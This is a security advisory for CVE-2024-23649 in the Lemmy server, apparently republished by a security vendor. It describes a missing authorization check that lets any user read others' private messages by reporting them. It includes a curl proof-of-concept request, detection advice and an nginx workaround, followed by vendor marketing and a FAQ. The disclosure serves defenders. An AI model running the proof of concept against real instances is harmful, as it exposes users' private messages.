Summary
Any authenticated user may obtain private message details from other users on the same instance
Users can report private messages, even when they're neither sender nor recipient of the message.
The API response to creating a private message report contains the private message itself, which means any user can just iterate over message ids to (loudly) obtain all private messages of an instance.
A user with instance admin privileges can also abuse this if the private message is removed from the response, as they're able to see the resulting reports.
Details
Creating a private message report by POSTing to /api/v3/private_message/report does not validate whether the reporter is the recipient of the message.
At least lemmy-ui does not allow the sender to report the message; the API method should likely be restricted to accessible to recipients only.
The API response when creating a report contains the private_message_report_view with all the details of the report, including the private message that has been reported:
In the report below, the creator with id 3 is different from the private message creator (id 2) and private message recipient (id 6).
{
"private_message_report_view": {
"private_message_report": {
"id": 14,
"creator_id": 3,
"private_message_id": 7,
"original_pm_text": "testfoo",
"reason": "reporting id 7",
"resolved": false,
"published": "2023-12-15T19:23:03.441967Z"
},
"private_message": {
"id": 7,
"creator_id": 2,
"recipient_id": 6,
"content": "testfoo",
"deleted": false,
"read": false,
"published": "2023-12-15T19:21:41.920872Z",
"ap_id": "https://1b1w56.lem.rocks/private_message/7",
"local": true
},
"private_message_creator": {
"id": 2,
"name": "admin",
"banned": false,
"published": "2023-12-14T23:45:05.055427Z",
"actor_id": "https://1b1w56.lem.rocks/u/admin",
"local": true,
"deleted": false,
"bot_account": false,
"instance_id": 1
},
"creator": {
"id": 3,
"name": "testuser1",
"banned": false,
"published": "2023-12-14T23:47:57.571772Z",
"actor_id": "https://1b1w56.lem.rocks/u/testuser1",
"local": true,
"deleted": false,
"bot_account": false,
"instance_id": 1
}
}
}
If these details were not available in the response, but reports could still be created by any user, or at least by any admin, this would allow an instance admin to create reports and obtain the message contents from the report system.
This was originally discovered from incorrect reports on a 0.18.5 instance and has been replicated in a 0.19.0 test environment.
PoC
curl -v 'https://myinstance.tld/api/v3/private_message/report' -X POST -H 'Content-Type: application/json' -H 'authorization: Bearer ...' --data-raw '{"private_message_id":1,"reason":"i like reports"}'
Detection
Any private message reports where the report creator is not equal to the private message recipient may be an attempt to exploit this.
As this was originally discovered from an incorrect report, likely related to a bug in a client app, it should be noted that not all mismatching reports should be considered malicious; though a frequent occurrence of them likely indicates an exploitation attempt.
Workaround when updating is not immediately possible
If an update to a fixed Lemmy version is not immediately possible, the API route can be blocked in the reverse proxy.
This will prevent anyone from reporting private messages, but it will also prevent exploitation before the update has been applied.
nginx example:
location = /api/v3/private_message/report {
default_type application/json;
return 403 '{"error":"couldnt_create_report"}';
}
Impact
Any authenticated user can obtain arbitrary (untargeted) private message contents.
Privileges required depend on the instance configuration; when registratons are enabled without application system, the privileges required are practically none.
When registration applications are required, privileges required could be considered low, but this assessment heavily varies by instance.
CVE-2024-23649 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.19.1); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2024-23649? CVE-2024-23649 is a high-severity security vulnerability in lemmy_server (rust), affecting versions >= 0.17.0, < 0.19.1. It is fixed in 0.19.1.
- How severe is CVE-2024-23649? CVE-2024-23649 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of lemmy_server are affected by CVE-2024-23649? lemmy_server (rust) versions >= 0.17.0, < 0.19.1 is affected.
- Is there a fix for CVE-2024-23649? Yes. CVE-2024-23649 is fixed in 0.19.1. Upgrade to this version or later.
- Is CVE-2024-23649 exploitable, and should I be worried? Whether CVE-2024-23649 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2024-23649 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2024-23649? Upgrade
lemmy_serverto 0.19.1 or later.